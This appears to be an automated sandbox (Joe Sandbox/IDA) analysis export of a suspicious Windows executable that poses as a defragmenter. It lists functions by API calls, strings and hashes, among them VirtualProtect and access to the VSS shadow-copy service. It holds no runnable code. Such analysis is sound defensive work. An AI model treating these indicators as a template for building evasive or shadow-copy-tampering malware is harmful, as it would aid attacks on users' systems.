                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1c04d11c75edf4c0478804df301d56424f261a04948507f745152b4363c18dfb
                                                                                                                                                                                                                                                                                                • Instruction ID: ffd961546834629cb9781ea50f6b089ee7ad7b01858337d742662dd2a5356549
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c04d11c75edf4c0478804df301d56424f261a04948507f745152b4363c18dfb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 713177B2E055299BF7108A10CC81AEB77B9EF94300F1950FAE48D53141D67D5FC28F92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e6d0927e0844a32fceeeeeb84cb3f5955536d0e40a5b5b25e2175d4af31a3e8
                                                                                                                                                                                                                                                                                                • Instruction ID: 3a8605b19ce2c47d3694022445aaca801366b191fc3089810cc4219c422979c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6d0927e0844a32fceeeeeb84cb3f5955536d0e40a5b5b25e2175d4af31a3e8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93102B2E056199BFB208A10CC91AEAB778EFC5301F1551FAD48D67281D6785FC28E92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e2e4f8be8850b93d7632264060324575389d572dda48007ff07afd8fbc87b2ac
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a5df1a00f150707abe8f498f5cc8a07a4b713fc45380ce59cf1aa3bff31ac2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2e4f8be8850b93d7632264060324575389d572dda48007ff07afd8fbc87b2ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F63146F3E056059BF7108A50DC85AEA7378EBD4311F2551BAE84D67681D2BC1FC28E62
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ab1e232686f64996957c428aa46097a5dca11d137d69d7a7f7db52e722a72dc7
                                                                                                                                                                                                                                                                                                • Instruction ID: efb2aaa402b8b894119f8764a0cc15061e94d759875b9d6e0f2f5a44f91e3c92
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab1e232686f64996957c428aa46097a5dca11d137d69d7a7f7db52e722a72dc7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B3118B2E016199BFB208A10CC91AEA7775EF85301F1550FAE94D57240D27D5FC18F52
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: de5e14736ce1b0675676b5b99ede00c589556290ac527a72a899a351e07207ba
                                                                                                                                                                                                                                                                                                • Instruction ID: c628551df413a5cee7df34e4b3a8cfd67ed3f0b839105bbca45370cffb56c7c8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de5e14736ce1b0675676b5b99ede00c589556290ac527a72a899a351e07207ba
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93178B3E056299BF7108A14CC819EA7779EF94310F1541FAE48DA3181D67C5FC28FA2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2dd88614d34e4d15a5c79062111781d0dde7d213e3835c72698bf74e69743748
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ab33ccecfcf5b50b999c453874eb1a36a3098376a6e5b90a4de9f98f348585e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd88614d34e4d15a5c79062111781d0dde7d213e3835c72698bf74e69743748
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A43145B3E056299BF7108A14CC819EA77B9EF84300F1550FAE48D63241D67C4FC28F96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3c00bf74d91e0688bd13399e1c7e6aa12c33e8a590711c51d1f7e82f30e369b2
                                                                                                                                                                                                                                                                                                • Instruction ID: e52d79b00cc71ee2398dc142699d77c982fe9885334e7043821f1d8f1332a01d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c00bf74d91e0688bd13399e1c7e6aa12c33e8a590711c51d1f7e82f30e369b2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D231F4B2E055199BFB208A11CC91AEAB7B5EBC5301F1091FAD48D67280D6781FC2CF56
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 412e1f2c20d0983e1dad4fe11b2d414e7bc4fcd8a0c6c19b1f180659cb664b96
                                                                                                                                                                                                                                                                                                • Instruction ID: a00f8fb7e5e19df1baf2c4893b4f5cd1aa4009d4866f0ad546c978fab3c233eb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 412e1f2c20d0983e1dad4fe11b2d414e7bc4fcd8a0c6c19b1f180659cb664b96
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2166F3E05605ABF7108610DC85AEB7379EBD4301F2590BAE84D97280D27C0FC28E62
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                                • Instruction ID: ff2e167dc762c1ef8e920f89ec5326e16b0d5a26b6533a079c5e15a382563c2e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03217CB2E0A6559BF7108A14CC81AEA7779EFC1301F1550FAE48D97281C67C0FC28F62
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 67018eab1eeb88e1bf7ee7ab3dc7d6d6a4e3c26557dd486d047caaf4de155c36
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c547ee69fa93407b955e4b491c610b6713a62dc04fb5845c0adee163d9b120d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67018eab1eeb88e1bf7ee7ab3dc7d6d6a4e3c26557dd486d047caaf4de155c36
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21F5B2E0661A9BF7108A00CC91AEAB779EFC5301F1550FAE54D67280D67C1FC28F52
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: aa084a66ee5737fb30ca38a0b1a15924c472f802b6777f03991ed9e752b3daf0
                                                                                                                                                                                                                                                                                                • Instruction ID: 24e34c4b74dd4bd73f0386bd3f67ff0c1536e8184ca5fe0cf7def5f7ee7710d2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa084a66ee5737fb30ca38a0b1a15924c472f802b6777f03991ed9e752b3daf0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221F5B2E0561A9BF7108A10CC91AEAB779EFC5301F1554FAE54DA7240D67C1FC28F52
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                                • Instruction ID: e00db402275725e990652d892f8b971178a2964019ba86a459431eb368788478
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF0F6C2C159009EF3184254ECABBBB3518DB90326F1842BFEA4B044C6A56C3FC94567
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                                • Instruction ID: f968807da2bbe673111a2d6e16995004d545fd51fd9e77028d14e4298e1144a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C012F14003045AF7008A60EC8ABAA7628D700351F148071ED0D54181862D4E964913
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: D$D$D$E$I$L$N$Q$R$T$a$a$a$a$a$c$c$e$e$e$e$e$f$g$i$l$l$l$m$n$o$o$o$r$r$r$r$t$t$t$t$t$t$u$u$y$y$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-795291402
                                                                                                                                                                                                                                                                                                • Opcode ID: 9c3c65fd969f292dabcc0fa9abe2f6d4db4770207e0ed296841166f48074e304
                                                                                                                                                                                                                                                                                                • Instruction ID: 7122a4342d64c85fee3a90dd2b4f37f44516dc6848c46918cd2647176de98852
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c3c65fd969f292dabcc0fa9abe2f6d4db4770207e0ed296841166f48074e304
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E72EEB1D042A88BFB248B24CC44BEABBB1EB85304F1441FAD44DA6281D77D5EC5CF66
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                                • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131
                                                                                                                                                                                                                                                                                                • API String ID: 1040333723-179025603
                                                                                                                                                                                                                                                                                                • Opcode ID: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                                • Instruction ID: 83c1616b1d25a5f5e88f9c25e0e2a21432fc20987b46dd7eda8cdac89d290607
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7811FF0FA031036E794AAA59C53FEB31686F44B44F20C81F760EB25D5C9ACA84556ED
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4C2
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4DD
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                                • String ID: VSS
                                                                                                                                                                                                                                                                                                • API String ID: 4136619037-4102325705
                                                                                                                                                                                                                                                                                                • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                                • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                                • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                                • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                                • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
